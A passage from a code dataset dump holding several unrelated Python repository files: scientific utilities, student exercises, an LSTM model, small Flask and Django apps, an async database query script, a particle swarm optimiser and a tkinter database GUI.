matplotlib.colors import rgb2hex\nfrom tqdm import tqdm \n\n# taken from coniii enumerate\ndef fast_logsumexp(X, coeffs=None):\n \"\"\"correlation calculation in Ising equation\n\n Args:\n X (np.Array): terms inside logs\n coeffs (np.Array, optional): factors in front of exponential. Defaults to None.\n\n Returns:\n float: sum of exponentials\n \"\"\"\n Xmx = max(X)\n if coeffs is None:\n y = np.exp(X-Xmx).sum()\n else:\n y = np.exp(X-Xmx).dot(coeffs)\n\n if y<0:\n return np.log(np.abs(y))+Xmx, -1.\n return np.log(y)+Xmx, 1.\n\n# still create J_combinations is slow for large number of nodes\ndef p_dist(h, J):\n \"\"\"return probabilities for 2**h states\n\n Args:\n h (np.Array): local fields\n J (np.Array): pairwise couplings. \n\n Returns:\n np.Array: probabilities for all configurations\n \"\"\"\n n_nodes = len(h)\n hJ = np.concatenate((h, J))\n h_combinations = np.array(list(itertools.product([1, -1], repeat = n_nodes)))\n J_combinations = np.array([list(itertools.combinations(i, 2)) for i in h_combinations])\n J_combinations = np.add.reduce(J_combinations, 2)\n J_combinations[J_combinations != 0] = 1\n J_combinations[J_combinations == 0] = -1\n condition_arr = np.concatenate((h_combinations, J_combinations), axis = 1)\n flipped_arr = hJ * condition_arr\n summed_arr = np.sum(flipped_arr, axis = 1)\n logsumexp_arr = fast_logsumexp(summed_arr)[0]\n Pout = np.exp(summed_arr - logsumexp_arr)\n return Pout[::-1]\n\ndef bin_states(n, sym=True):\n \"\"\"generate 2**n possible configurations\n\n Args:\n n (int): number of questions (features)\n sym (bool, optional): symmetric system. Defaults to True.\n\n Returns:\n np.Array: 2**n configurations \n \"\"\"\n v = np.array([list(np.binary_repr(i, width=n)) for i in range(2**n)]).astype(int)\n if sym is False:\n return v\n return v*2-1\n\n# '''https://stackoverflow.com/questions/42752610/python-how-to-generate-the-pairwise-hamming-distance-matrix'''\ndef hamming_distance(X):\n \"\"\"Calculate Hamming distance\n\n Args:\n X (np.Array): Array of binary values (rows = configurations, columns = binary answers)\n\n Returns:\n np.Array: hamming distance (rows * rows)\n \"\"\"\n return (X[:, None, :] != X).sum(2)\n\ndef top_n_idx(N, p, ind_colname='config_id', prob_colname='config_prob'):\n \"\"\"get the most probable N states\n\n Args:\n N (int): number of configurations wanted\n p (np.Array): array of probabilities for configurations\n ind_colname (str, optional): desired column name for index column. Defaults to 'config_id'.\n val_colname (str, optional): desired column name for probability column. Defaults to 'config_prob'.\n\n Returns:\n pd.DataFrame: Dataframe with most probable N states, their index and probability\n \"\"\"\n N = N+1\n val_cutoff = np.sort(p)[-N]\n p_ind = np.argwhere(p > val_cutoff).flatten()\n p_val = p[p_ind]\n data_out = pd.DataFrame({ind_colname: p_ind, prob_colname: p_val}).nlargest(N, prob_colname)\n return data_out.reset_index(drop = True)\n\ndef sort_edge_attributes(Graph, weight_attribute, filter_attribute, scaling = 1): \n \"\"\"Return list of edges and list of edge weights, both sorted by edge weights (filtered, scaled)\n\n Args:\n Graph (nx.Graph): networkx graph object with weight_attribute and filter_attribute\n weight_attribute (str): weight attribute (could be other attribute, but should be numeric)\n filter_attribute (str): filter attribute (e.g. only hamming distance == 1).\n scaling (numeric): scaling of weights (for visualization purposes). Defaults to 1 (not scaled).\n\n Returns:\n lists: list of edges, list of edge weights. \n \"\"\"\n ## get edge attributes\n edge_weight = nx.get_edge_attributes(Graph, weight_attribute)\n edge_hdist = nx.get_edge_attributes(Graph, filter_attribute)\n\n ## sort edge weights by value\n edge_weights_sorted = sorted(edge_weight.items(), key=lambda x: x[1])\n edge_weights_filtered = [(k, v) for k, v in edge_weights_sorted if edge_hdist[k] == 1]\n \n # scale edge weights\n edge_weights_scaled = [(k, v * scaling) for k, v in edge_weights_filtered]\n \n # return edge list and scaled weights\n edge_list = [k for k, _ in edge_weights_scaled]\n edge_weights = [v for _, v in edge_weights_scaled]\n \n return edge_list, edge_weights\n\ndef sort_node_attributes(Graph, sorting_attribute, value_attribute):\n \"\"\"Sort nodes based on attribute and return sorted node list and value list\n\n Args:\n Graph (nx.Graph): networkx graph object\n sorting_attribute (str): string containing sorting attribute\n value_attribute (str): string containing value attribute\n\n Returns:\n lst: list of sorted nodes and values\n \"\"\"\n sorting_attr = nx.get_node_attributes(Graph, sorting_attribute)\n nodelist_sorted = [k for k, v in sorted(sorting_attr.items(), key=lambda item: item[1])]\n value_attr = nx.get_node_attributes(Graph, value_attribute)\n value_sorted = [v for k, v in sorted(value_attr.items(), key=lambda pair: nodelist_sorted.index(pair[0]))]\n return nodelist_sorted, value_sorted\n\ndef hamming_edges(N, H_distances):\n \"\"\"Get edgelist with hamming distance for the top N states\n\n Args:\n N (int): Number of configurations\n H_distances (np.Array): Array of hamming distances (shape N * N)\n\n Returns:\n _type_: _description_\n \"\"\"\n col_names = [f'hamming{x}' for x in range(N)]\n df = pd.DataFrame(H_distances, columns=col_names)\n df['node_x'] = df.index\n df = pd.wide_to_long(df, stubnames=\"hamming\", i='node_x', j='node_y').reset_index()\n df = df[df['node_x'] != df['node_y']]\n df.drop_duplicates(inplace=True)\n return df\n\ndef edge_strength(G, nodestrength):\n \"\"\"Add multiplicative and additive edge strength based on node attribute\n\n Args:\n G (nx.Graph): networkx graph object\n nodestrength (str): node attribute (numeric)\n\n Returns:\n nx.Graph: New graph with added edge attributes\n \"\"\"\n Gcopy = G.copy()\n for edge_x, edge_y in Gcopy.edges():\n pmass_x = Gcopy.nodes[edge_x][nodestrength]\n pmass_y = Gcopy.nodes[edge_y][nodestrength]\n Gcopy.edges[(edge_x, edge_y)].update({\n 'pmass_mult': pmass_x * pmass_y,\n 'pmass_add': pmass_x + pmass_y\n })\n return Gcopy\n\ndef match_nodeid(df, node_id, N = 10):\n \"\"\"get the entries associated with a particular node_id in descending order of probability\n\n Args:\n df (pd.DataFrame): dataframe with columns \"node_id\", \"entry_name\", \"entry_id\", \"entry_prob\"\n node_id (int): node identifier, typically integer.\n N (int, optional): number of rows to print. Defaults to 10.\n \"\"\"\n df = df[df['node_id'] == node_id][['entry_name', 'entry_id', 'entry_prob']]\n df = df.sort_values('entry_prob', ascending = False)\n print(df.head(N))\n\ndef match_substring(df, entry_name, N = 10):\n \"\"\"Returns entries containing substring\n\n Args:\n df (pd.DataFrame): dataframe with column \"entry_name\"\n entry_name (string): substring to match in \"entry_name\" column\n N (int, optional): number of rows to display. Defaults to 10.\n \"\"\"\n df = df[df['entry_name'].str.contains(entry_name)]\n print(df.head(N))\n \n\ndef hamming_neighbors_N_removed(N, config_id_focal, configurations, configuration_probabilities): \n \"\"\"return Hamming neighbors within hamming distance N\n\n Args:\n N (int): Hamming distance from focal node (config_id_focal)\n config_id_focal (int): index of focal configuration\n configurations (np.Array): array of configurations\n configuration_probabilities (np.Array): array of probabilities\n\n Returns:\n pd.DataFrame: dataframe with Hamming neighbors of focal node\n \"\"\"\n config_focal = configurations[config_id_focal]\n config_prob_focal = configuration_probabilities[config_id_focal]\n lst_neighbors = [(config_id_focal, config_prob_focal, config_id_neighbor, configuration_probabilities[config_id_neighbor], np.count_nonzero(config_focal!=config_neighbor))\n for config_id_neighbor, config_neighbor in enumerate(configurations) \n if np.count_nonzero(config_focal!=config_neighbor) <= N and config_id_focal != config_id_neighbor]\n df_neighbors = pd.DataFrame(\n lst_neighbors,\n columns = ['config_id_focal', 'config_prob_focal', 'config_id_neighbor', 'config_prob_neighbor', 'hamming'] \n )\n return df_neighbors","repo_name":"victor-m-p/humanities-glass","sub_path":"preprocessing/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":8845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"16865949460","text":"#Goal: remove vowels unless they start the word, remove consecutive letters. \r\n\r\nf = 'Hello everybody. I wanted to say something. If it were true that life had meaning, then life must have a higher power as meaning is constructed through being.'\r\n\r\ndef vowel_remove(text):\r\n new_text = ''\r\n for char in text:\r\n if char == 'a' or char == 'e' or char == 'i' or char == 'o' or char == 'u':\r\n char = ''\r\n new_text += char\r\n new_text += char\r\n return new_text\r\n\r\ndef vowel_remove_mod(text):\r\n text = text.lower()\r\n end_text = text[::-1]\r\n ind = 0 \r\n new_text = ''\r\n while ind != -1:\r\n word = text[ind:ind + 2]\r\n for char in text[ind + 2:text.find(' ', ind + 1)]:\r\n if char == 'a' or char == 'e' or char == 'i' or char == 'o' or char == 'u':\r\n char = ''\r\n word += char\r\n else:\r\n word += char\r\n new_text += word\r\n ind = text.find(' ', ind + 1)\r\n return new_text + end_text[0]\r\n\r\ndef cons_remove(text):\r\n count = -1\r\n new_text = ''\r\n for char in text:\r\n if char == text[count]:\r\n char = ''\r\n new_text += char\r\n count += 1\r\n else:\r\n new_text += char\r\n count += 1\r\n return new_text\r\n\r\ndef polish(text):\r\n inc_text = vowel_remove_mod(cons_remove(text))\r\n first_word = inc_text[0:inc_text.find(' ')]\r\n first_letter = first_word[0]\r\n rest_word = vowel_remove(first_word[1::])\r\n new_word = first_letter + rest_word\r\n new_text = new_word + inc_text[inc_text.find(' ')::]\r\n return new_text\r\n\r\nprint(polish(f))\r\n# print(vowel_remove(f))\r\n#--------------------\r\n\r\n#Goal: Prime Number\r\ndef prime(maxval):\r\n lst = []\r\n for val in range(1, maxval):\r\n count = 0\r\n for fac in range(2,val):\r\n if val % fac == 0:\r\n break\r\n else:\r\n count += 1 \r\n if count == val-2:\r\n lst.append(val)\r\n return lst\r\n\r\ndef special_prime(lst):\r\n frst_ind = 0\r\n scnd_ind = 1\r\n new_lst = []\r\n x = 0\r\n while x + 1 < len(lst):\r\n check_num = lst[frst_ind] + lst[scnd_ind] + 1\r\n if check_num in lst:\r\n new_lst.append(check_num)\r\n frst_ind += 1\r\n scnd_ind += 1 \r\n x += 1\r\n else:\r\n frst_ind += 1\r\n scnd_ind += 1 \r\n x += 1\r\n return new_lst\r\n\r\n#mx_val = 1000\r\n#print(prime(mx_val))\r\n#print(special_prime(prime(mx_val)))\r\n#print(len(special_prime(prime(mx_val))))\r\n#print(len(special_prime(special_prime(prime(mx_val)))))\r\n\r\n#--------------------\r\n\r\n#Goal: Dice roller- takes number of faces, number of rolls, number of dice\r\nimport random\r\ndef roll(num_rolls, *args):\r\n lst = []\r\n count = 0\r\n while count != num_rolls:\r\n for arg in args:\r\n lst.append(random.randint(1,arg))\r\n count += 1\r\n return sum(lst)\r\n#print(roll(1,3,6,7,20,3,12))\r\n\r\n","repo_name":"bencoxfaxon/my-python","sub_path":"Python Projects/functional_programming.py","file_name":"functional_programming.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"30153527259","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom ..layers import SingleEmbedding\n\nclass RecurrentModel(torch.nn.Module):\n def __init__(self, config):\n super().__init__()\n\n self.device = config.device\n\n self.num_nodes = config.num_nodes\n self.horizon = config.horizon\n self.topk = config.topk\n self.embed_dim = config.embed_dim\n self.lags = config.window_size\n\n # dummy\n self.embedding = SingleEmbedding(1, 1, 1).to(self.device)\n\n # encoder lstm\n self.lstm = nn.LSTM(self.num_nodes, 512, 2, batch_first=True, dropout=0.25)\n \n # decoder lstm\n self.cell1 = nn.LSTMCell(self.num_nodes, 512)\n self.cell2 = nn.LSTMCell(512, 512)\n\n # linear prediction layer\n self.pred = nn.Linear(512, self.num_nodes)\n\n def get_graph(self):\n return self.embedding.get_A()\n \n def get_embedding(self):\n return self.embedding.get_E()\n\n\n def forward(self, window):\n # batch stacked window; input shape: [num_nodes*batch_size, lags]\n N = self.num_nodes # number of nodes\n T = self.lags # number of input time steps\n B = window.size(0) // N # batch size\n\n x = window.view(B, T, N)\n\n # encoder\n _, (h, c) = self.lstm(x) # -> (B, T, H), (2, B, H), (2, B, H)\n # get hidden and cell states for each layer\n h1 = h[0, ...].squeeze(0)\n h2 = h[1, ...].squeeze(0)\n c1 = c[0, ...].squeeze(0)\n c2 = c[1, ...].squeeze(0)\n\n # decoder\n predictions = []\n for _ in range(self.horizon-1):\n pred = self.pred(h2)\n predictions.append(pred.view(-1, 1))\n # layer 1\n h1, c1 = self.cell1(pred, (h1, c1))\n h1 = F.dropout(h1, 0.2)\n c1 = F.dropout(c1, 0.2)\n # layer 2\n h2, c2 = self.cell2(h1, (h2, c2))\n # final prediction\n pred = self.pred(h2).view(-1, 1)\n predictions.append(pred)\n\n return torch.cat(predictions, dim=1)\n\n\n","repo_name":"timbrockmeyer/mulivariate-time-series-anomaly-detection","sub_path":"src/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"73"} +{"seq_id":"6081406060","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n# create Flask instance\napp = Flask(__name__)\n\n# use PyMongo to establish connection\n# mongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_db\")\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\ndef home():\n\n # find data from mongo database\n mars = mongo.db.collection.find_one()\n\n # return template and data\n return render_template(\"index.html\", mars=mars)\n\n@app.route(\"/scrape\")\ndef scrape():\n\n mars = mongo.db.collection\n \n mars_info = scrape_mars.scrape()\n mars_info = scrape_mars.mars_image()\n # mars_info = scrape_mars.mars_weather()\n mars_info = scrape_mars.mars_facts()\n mars_info = scrape_mars.mars_hemispheres()\n\n mars.update({}, mars_info, upsert=True)\n \n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"rickshev/Web-Scraping-Challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74967982635","text":"import asyncio\nimport sys\nfrom concurrent.futures.process import ProcessPoolExecutor\nfrom typing import List, Dict\nfrom utils import get_pool\n\nsys.path.append(\"src\")\nfrom util.async_timer import async_timed\n\nproduct_query = \"\"\"\n SELECT\n p.product_id,\n p.product_name,\n p.brand_id,\n s.sku_id,\n pc.product_color_name,\n ps.product_size_name\n FROM product as p\n JOIN sku as s on s.product_id = p.product_id\n JOIN product_color as pc on pc.product_color_id = s.product_color_id\n JOIN product_size as ps on ps.product_size_id = s.product_size_id\n WHERE p.product_id = 100\"\"\"\n\n\nasync def query_product(pool):\n async with pool.acquire() as connection:\n return await connection.fetchrow(product_query)\n\n\n@async_timed()\nasync def query_product_concurrently(pool, query_num):\n queries = [query_product(pool) for _ in range(query_num)]\n return await asyncio.gather(*queries)\n\n\ndef run_in_new_loop(num_queries: int) -> List[Dict]:\n async def run_queries():\n async with get_pool() as pool:\n return await query_product_concurrently(pool, num_queries)\n\n results = [dict(result) for result in asyncio.run(run_queries())]\n return results\n\n\n@async_timed()\nasync def main():\n loop = asyncio.get_running_loop()\n pool = ProcessPoolExecutor()\n tasks = []\n for _ in range(5):\n tasks.append(loop.run_in_executor(pool, run_in_new_loop, 10000))\n\n all_results: List[List[Dict]] = await asyncio.gather(*tasks)\n total_queries = sum([len(result) for result in all_results])\n print(f\"Retrieved {total_queries} products the product database.\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"akitanak/python_concurrency_with_asyncio","sub_path":"src/database/query_products_one_event_loop_per_process.py","file_name":"query_products_one_event_loop_per_process.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"892218438","text":"def shuffle(n):\n if n <= 0:\n return ''\n\n discarteds = []\n cards = get_cards(n)\n\n while True:\n if len(cards) <= 1:\n break\n\n discarteds.append(cards.pop())\n top = cards.pop()\n\n cards = [top] + cards\n\n return (\n \"Discarded cards: \" + ', '.join(int_list_to_string(discarteds)) + \"\\n\"\n \"Remaining card: \" + str(cards.pop())\n )\n\n\ndef get_cards(n):\n return [card + 1 for card in range(n)][::-1]\n\n\ndef int_list_to_string(int_list):\n return [str(x) for x in int_list]\n\n\nif __name__ == '__main__':\n while True:\n n = int(input())\n if n == 0:\n break\n\n print(shuffle(n))\n","repo_name":"SergioVenicio/URI","sub_path":"1110/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"27023351874","text":"from django.test import TestCase\n\nfrom ..models import Recipe, Tag\n\nclass RecipeTestCase(TestCase):\n\n def setUp(self):\n self.recipe_data = {\n 'name': 'recipe-test',\n 'description': 'description',\n 'image': 'needs-to-be-data',\n 'difficulty': 'E',\n 'serves': 1,\n 'time_prep': 2,\n 'time_cook': 3,\n 'time_other': 4\n }\n Recipe.objects.create(**self.recipe_data)\n \n def test_create(self):\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n self.assertEqual(recipe.name, self.recipe_data['name'])\n self.assertEqual(recipe.description, self.recipe_data['description'])\n self.assertEqual(len(recipe.tags.all()), 0)\n self.assertEqual(len(recipe.steps.all()), 0)\n \n def test_add_tag(self):\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n Tag.objects.create(name='test')\n tag = Tag.objects.get(name='test')\n recipe.add_tag(tag)\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n self.assertEqual(len(recipe.tags.all()), 1)\n","repo_name":"JoelPagliuca/ReciPi-2017","sub_path":"com.jpagliuca.recipi/src/main/api/recipiApi/recipi/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"74585205355","text":"l = int(input())\r\ns = list(map(int, input().split()))\r\nn = int(input())\r\n\r\ns.sort()\r\nif n in s :\r\n print(0)\r\nelse :\r\n min = 0\r\n max = 0\r\n for i in s :\r\n if i < n :\r\n min = i\r\n elif i > n and max == 0 :\r\n max = i\r\n min += 1\r\n max -= 1\r\n print((n-min)*(max-n+1) +(max-n))","repo_name":"ellieso/algorithm_study","sub_path":"백준/Silver/1059. 좋은 구간/좋은 구간.py","file_name":"좋은 구간.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27055578001","text":"from flask import Flask, render_template, request\nimport re\nimport yaml\nfrom options import options, options_dict\n\napp = Flask(__name__)\n\n# Ruta principal para mostrar el formulario y el resultado\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n docker_command = request.form['docker_command']\n docker_compose_yaml = convert_to_docker_compose(docker_command)\n return docker_compose_yaml\n\n return render_template('index.html')\n\ndef find_options(command):\n # separa las palabras de command para obtener luego la imagen\n command_sep = command.split()\n # Expresión regular para buscar opciones en el comando\n pattern = r\"-(\\w+)|--(\\w+[-\\w]+)|--(\\w+)\"\n # Buscar coincidencias de opciones en el comando\n matches = re.findall(pattern, command)\n # Lista para almacenar las opciones encontradas\n found_options = []\n # Procesar las coincidencias y compararlas con el diccionario de opciones\n for match in matches:\n option = match[0] or match[1] or match[2] # El resultado puede estar en una de las tres posiciones\n\n if f\"--{option}\" in options:\n value=''\n value_index = command.index(option) + len(option) + 1\n if value_index < len(command):\n for i in range(value_index, len(command)):\n value += command[i]\n if command[i].startswith(' '):\n break\n value = value.strip()\n found_options.append((option, value))\n elif f\"-{option}\" in options:\n value=''\n value_index = command.index(option) + len(option) + 1\n if value_index < len(command):\n for i in range(value_index, len(command)):\n value += command[i]\n if command[i].startswith(' '):\n break\n value = value.strip()\n found_options.append((option, value))\n\n for word in command_sep:\n if any(word in option for option in found_options) or word.lower() in ['docker', 'run']:\n continue\n if not word.startswith('-'):\n image = word\n break\n if image is not None:\n found_options.append((\"image\", image))\n\n\n return found_options\n\n\ndef convert_to_docker_compose(command):\n # Obtener las opciones encontradas\n options_found = find_options(command)\n\n # Extraer la imagen de las opciones encontradas\n image_name = None\n for option, value in options_found:\n if option == 'image':\n image_name = value\n break\n\n # Construir el fragmento de texto de Docker Compose\n docker_compose_text = f'version: \"3.3\"\\n' \\\n f'services:\\n' \\\n f' {image_name}:\\n' \\\n f' image: {image_name}\\n'\n\n # Agregar las opciones al fragmento de texto de Docker Compose\n for option, value in options_found:\n if option != 'image' and option in options_dict:\n compose_key = options_dict[option]\n if '/' in compose_key:\n compose_key, sub_key = compose_key.split('/')\n docker_compose_text += f\" {compose_key}:\\n\" \\\n f\" {sub_key}:\\n\" \\\n f\" {value}\\n\"\n else:\n docker_compose_text += f\" {compose_key}: {value}\\n\"\n\n # Generar el YAML de Docker Compose\n docker_compose_yaml = yaml.safe_dump(docker_compose_text, sort_keys=False, default_style='|')\n docker_compose_yaml = docker_compose_yaml.strip('|')\n return docker_compose_yaml\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"nomadecool/docker-compose","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22070924612","text":"import numpy as np\nimport random\nimport math\nimport matplotlib.pyplot as plt\nimport time\n\nclass Particle:\n def __init__(self, position, velocity = 0):\n self.position = position\n self.velocity = velocity\n self.local_best = position\n \n def update_position(self, position_limits):\n self.position = round((self.position + self.velocity), 0)\n\n # set position to the min or max value if it goes out of bounds\n if self.position > position_limits[1]:\n self.position = position_limits[1]\n elif self.position < position_limits[0]:\n self.position = position_limits[0]\n \n def update_velocity(self, inertia, alpha, beta, global_best):\n self.velocity = (inertia * self.velocity) + (alpha[0] * beta[0] * (self.local_best - self.position)) + (alpha[1] * beta[1] * (global_best - self.position))\n\n def update_local_best(self):\n if calc_fitness(self.position) > calc_fitness(self.local_best):\n self.local_best = self.position\n\ndef calc_acc_cost(position):\n days = position // 1440\n return round((30 + (days * 30) + ((7 - days) * 25)), 2)\n\ndef calc_ren_lvl(position):\n T = position / 1440\n return ((T**2) / 126) + (T / 63) + 0.5\n\ndef calc_mov_cost(position):\n t = (position % 1440) / 60\n return round(((50 * math.cos((12 * math.pi * t) / 24)) + (50 * math.cos((8 * math.pi * t) / 24)) + 150),2)\n\ndef calc_fitness(position):\n # fixed values for the minimum and maximum values of each variable\n ren_lvl_range = [0.5, 1]\n acc_cost_range = [205, 235]\n mov_cost_range = [68.29, 250]\n\n # calculate the cost and levels\n accommodation_cost = calc_acc_cost(position)\n renovation_level = calc_ren_lvl(position)\n moving_cost = calc_mov_cost(position)\n\n ## fitness function, all values are scaled to 0-1\n fitness = renovation_level\n fitness += 1 - (((accommodation_cost - acc_cost_range[0]) + (moving_cost - mov_cost_range[0])) / ((acc_cost_range[1] - acc_cost_range[0]) + (mov_cost_range[1] - mov_cost_range[0])))\n\n return fitness\n\ndef check_global_best(local_best, global_best):\n if calc_fitness(local_best) > calc_fitness(global_best):\n return local_best\n else:\n return global_best\n\n\ndef calc_avg_fit_diff(particles):\n fitness = list(map(calc_fitness, [particle.position for particle in particles]))\n mean_fitness = sum(fitness) / len(fitness)\n difference = [abs(fit-mean_fitness) for fit in fitness]\n avg_fit_diff = sum(difference)/len(difference)\n return avg_fit_diff\n return avg_fit_diff\n\ndef calc_avg_pos_diff(particles):\n position_list = [particle.position for particle in particles]\n mean_position = sum(position_list) / len(position_list)\n difference = [abs(pos - mean_position) for pos in position_list]\n avg_pos_diff = sum(difference)/len(difference)\n return avg_pos_diff\n\ndef initialize_particles(num_particles, position_limits, spawn_segments):\n particles = []\n pop_segment = num_particles//spawn_segments\n range_val = position_limits[1]//spawn_segments\n min_val = position_limits[0]\n max_val=range_val\n for segment in range(spawn_segments):\n for num in range(pop_segment):\n particles.append(Particle(random.randint(min_val, max_val)))\n min_val+=range_val\n max_val+=range_val\n return particles\n\ndef main():\n computation_list = []\n \n for i in range(1, 101):\n random.seed(5)\n # fixed variables\n position_cap = 10079 # minute representation of Sunday 11:59\n\n # parameters \n alpha = [0.5, 0.5]\n alpha_change = 0.1 # How much alpha values increase or decrease at split\n inertia_weight = 1\n inertia_change = 0.2 # How much inertia weight decrease at split\n iteration_split = 5 # Iteration split - alpha and inertia values increase/decrease at split\n num_particles = 10*i\n spawn_segments = 10 # Initialization splits\n \n # termination condition\n max_iter = 100\n min_avg_fit_diff = 0.01\n min_avg_dis_diff = 0.01\n\n # initialization\n global_best = None\n position_limits = [0, position_cap]\n curr_iter = 0\n\n particles = initialize_particles(num_particles, position_limits, spawn_segments)\n global_best = particles[0].position\n start = time.time()\n while((curr_iter < max_iter) and (calc_avg_fit_diff(particles) > min_avg_fit_diff) and (calc_avg_pos_diff(particles) > min_avg_dis_diff)):\n \n if (curr_iter % (max_iter//iteration_split) == 0) and (curr_iter != 0):\n inertia_weight -= inertia_change\n alpha[0] -= alpha_change\n alpha[1] += alpha_change\n\n for particle in particles:\n particle.update_local_best()\n global_best = check_global_best(particle.local_best, global_best)\n \n beta = [1,1]\n\n for particle in particles:\n particle.update_velocity(inertia_weight, alpha, beta, global_best)\n particle.update_position(position_limits)\n \n curr_iter += 1\n \n computation_list.append(time.time()-start)\n print(time.time()-start)\n \n plt.figure()\n plt.plot([x*10 for x in range(1,101)], computation_list)\n plt.ylabel(\"Computational Speed\")\n plt.xlabel(\"Population\")\n plt.title(\"Computational time vs Population\")\n plt.savefig(\"Computational_time_vs_Population\",bbox_inches='tight')\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Nonentity5565/Computational-Intelligence-Assignment1","sub_path":"Problem 2 - Particle Swarm Optimization/Tests/population_time_complexity_test.py","file_name":"population_time_complexity_test.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22691400082","text":"import os\nimport subprocess\n\ndef execute_python_file(file_name):\n try:\n subprocess.run([\"python\", file_name], check=True)\n except FileNotFoundError:\n print(f\"The file '{file_name}' does not exist.\")\n except subprocess.CalledProcessError as e:\n print(f\"An error occurred while executing '{file_name}':\")\n print(e)\n\ndef main():\n current_directory = os.getcwd()\n file_list = [file for file in os.listdir(current_directory) if file.endswith(\".py\")]\n \n if not file_list:\n print(\"No Python files found in the current directory.\")\n return\n\n print(\"Python files in the current directory:\")\n for idx, file_name in enumerate(file_list, start=1):\n print(f\"{idx}. {file_name}\")\n\n user_choice = input(\"Enter the number corresponding to the file you want to execute (or 'q' to quit): \")\n if user_choice.lower() == 'q':\n return\n\n try:\n file_index = int(user_choice) - 1\n selected_file = file_list[file_index]\n execute_python_file(selected_file)\n except (ValueError, IndexError):\n print(\"Invalid input. Please enter a valid file number.\")\n main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"BeautyScraper/ftppy","sub_path":"batch_file_gen.py","file_name":"batch_file_gen.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8037321044","text":"from tkinter.ttk import Combobox, Treeview, Frame, Entry, Checkbutton, Radiobutton\nfrom tkinter import messagebox as mb, BooleanVar, IntVar, filedialog as fd\nfrom tkinter import Tk, Label, Button\nfrom pymysql import DatabaseError, OperationalError\nfrom DataBase import DataBase, CONN_INFO\nfrom datetime import datetime as dt\nimport shutil as sh\nimport os\n\n\nclass DBWindow(Tk):\n def __init__(self):\n try:\n super().__init__()\n self.attributes(\n \"-fullscreen\",\n True\n )\n\n # =====================Variables=====================\n\n self.__db: DataBase\n self.__r_var = IntVar()\n self.__r_var.set(0)\n self.__old_r_var = IntVar()\n self.__old_r_var.set(self.__r_var.get())\n self.__radio_btns: list = []\n self.__old_record: tuple = ()\n self.__old_path_to_file: str = ''\n self.__old_file_name: str = ''\n self.__path_to_file: str = ''\n self.__file_name: str = ''\n self.__need_to_upload_file: bool = False\n\n # =======================Dicts=======================\n\n self.__input_entries: dict = {}\n self.__input_entries_lbls: dict = {}\n self.__input_combos_vars: dict = {}\n self.__column_types: dict = {}\n self.__columns: dict = {}\n self.__input_values: dict = {'names': [], 'values': []}\n self.__input_values_mul: dict = {}\n\n # ================Initializing DBFrame================\n\n self.__frame_db = Frame(self)\n self.__frame_table = Frame(self.__frame_db, width=1300, height=650)\n self.__frame_table.pack_propagate(False)\n self.iconbitmap('icon.ico') # обновление иконки приложения\n self.__table = Treeview(self.__frame_table, columns=(), show='headings', height=650)\n self.__table.bind('', self.__select_table_item)\n self.__frame_chosen_table = Frame(self.__frame_db, padding=5)\n # self.__lbl = Label(self.__frame_chosen_table, text=\"Привет\", font=24) # обычная надпись\n # self.__btn_choose = Button(self.__frame_chosen_table, text=\"Выбрать\", font=24, bg=\"white\", fg=\"blue\",\n # command=self.__choose_table_click) # создание кнопки\n self.__btn_quit = Button(self.__frame_chosen_table, text=\"Выйти\", font=('Comic Sans MS', 12), bg=\"white\",\n fg=\"blue\", command=self.__quit_click, height=27)\n # self.__combo = Combobox(self.__frame_chosen_table) # создание поля выбора\n self.__frame_radio = Frame(self.__frame_db, relief='sunken')\n self.__radio_lbl = Label(self.__frame_radio, text='Выберите таблицу:', font=('Comic Sans MS', 10))\n self.__frame_input_value = Frame(self.__frame_db, relief='ridge')\n self.__input_entries_text = Label(self.__frame_input_value, text='Введите данные: ',\n font=('Arial', 10))\n self.__frame_insert_btns = Frame(self.__frame_db, relief='sunken', padding=5, width=1300)\n self.__insert_btn = Button(self.__frame_insert_btns, text='Добавить', font=('Comic Sans MS', 14),\n bg='white', fg='blue', command=self.__insert_click, width=1290 // 34 + 1)\n self.__delete_btn = 